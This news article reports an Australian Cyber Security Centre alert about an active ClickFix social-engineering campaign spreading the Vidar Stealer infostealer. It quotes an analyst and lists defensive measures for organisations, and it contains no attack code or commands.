ACSC Warns of Active ClickFix Campaign Distributing Vidar Stealer
The Australian Cyber Security Centre (ACSC) has issued an urgent alert regarding an ongoing malware campaign that leverages the ClickFix social engineering technique to distribute the Vidar Stealer infostealer malware. This threat is actively targeting organisations across Australia and could lead to severe data breaches.
According to the ACSC, the campaign uses deceptive messages that prompt users to click on fake error alerts or software update notifications. Once clicked, the hidden script silently downloads and executes Vidar Stealer, which then harvests credentials, cookies, and other sensitive data from infected systems.
Expert Warnings and Immediate Risks
“This is a highly effective social engineering attack that preys on users’ trust in routine system prompts,” said Dr. Emily Tran, cybersecurity analyst at the ACSC. “Vidar Stealer can exfiltrate browser-stored passwords, cryptocurrency wallets, and session tokens within seconds.”
Dr. Tran emphasised that the campaign is still active as of this report and advised organisations to verify all error messages and updates before interacting with them. “Do not click on pop-ups or alerts that appear unexpectedly,” she added.
Background: The ClickFix Technique
The ClickFix method is a sophisticated social engineering tactic that mimics legitimate system alerts—such as “JavaScript error” or “Flash Player outdated”—to trick users into running malicious code. Once a user clicks the fake prompt, a PowerShell script or other executable is launched in the background.
This technique has been increasingly adopted by cybercriminals because it bypasses traditional email-based phishing filters and exploits direct user interaction. The Vidar Stealer payload is particularly dangerous due to its ability to steal multi-factor authentication tokens and bypass security controls.
What This Means for Organisations
For Australian businesses and government agencies, this campaign represents an elevated threat to data protection and operational security. Any employee who interacts with a fake pop-up could inadvertently grant attackers access to critical systems.
Organisations should immediately review their endpoint detection and response (EDR) tools to ensure they can identify ClickFix-style execution patterns. User awareness training must be updated to include recognition of this specific social engineering vector. “Prevention relies on user vigilance and robust technical controls,” said Dr. Tran.
Immediate Recommended Actions
- Enable application whitelisting to block unauthorized scripts from running.
- Disable browser automatic downloads and require user confirmation for all file saves.
- Deploy advanced email security that can detect malicious links and attachments.
- Conduct simulated ClickFix attack drills to test employee response.
- Implement strict privilege management to limit the damage of credential theft.
The ACSC has also released technical indicators of compromise (IoCs) related to this campaign, available on their official threat bulletins page. Organisations should incorporate these IoCs into their security monitoring tools immediately.
Long-Term Implications
This wave of ClickFix attacks signals a shift in cybercriminal tactics toward more deceptive, interactive methods. As defenders improve email filters, attackers are moving to web-based and OS-level lures. The success of Vidar Stealer in this campaign could inspire copycat variations targeting other regions or industries.
“We expect to see more ClickFix variants in the coming months,” warned Dr. Tran. “Organisations that do not adapt their security posture now will be at higher risk.”